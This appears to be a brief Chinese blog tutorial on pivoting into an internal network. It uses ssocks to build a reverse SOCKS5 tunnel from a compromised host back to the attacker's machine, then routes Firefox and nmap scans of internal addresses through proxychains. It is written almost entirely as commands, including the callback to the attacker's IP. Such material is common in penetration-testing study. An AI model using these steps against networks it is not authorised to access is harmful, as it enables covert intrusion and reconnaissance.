1. 下载代理工具

  http://sourceforge.net/projects/ssocks/

 

2. 安装

  下载成功后,将该工具放到攻击机和肉鸡里面进行安装,放在tmp文件夹下面。

  tar zxvf ssocks-0.0.14.tar.gz

  cd ssocks-0.0.14

  编译文件:./configure && make

  进入文件目录: src

  

3. 攻击机执行操作

  ./rcsocks -l 攻击机待转端口 -p 中转端口 -vv  即等待远程Sock5服务器访问攻击机的中转端口,创建中转端口和待转端口的连接通道。-vv表示显示详细信息。

 

4. 肉鸡执行操作

  ./rssocks -vv -s 攻击机ip+端口  主动连接

 

5. 利用proxychains进行Socks5代理

  apt-get install proxychains(kali已经自带了)

  但是kali中,需要修改配置文件: gedit /etc/proxychains.conf,将其中的socks4改成socks5(在ProxyList中把socks4前面输入#注释,然后输入socks5 127.0.0.1 待转端口)

  隧道建立好后,可以使用命令访问: proxychains firefox http://内网ip

  然后用kali里面的nmap扫描内网: proxychains nmap -Pn -sT 内网地址(要使用tcp扫描)

 

posted on 2021-08-24 18:10  EndlessShw  阅读(272)  评论(0编辑  收藏  举报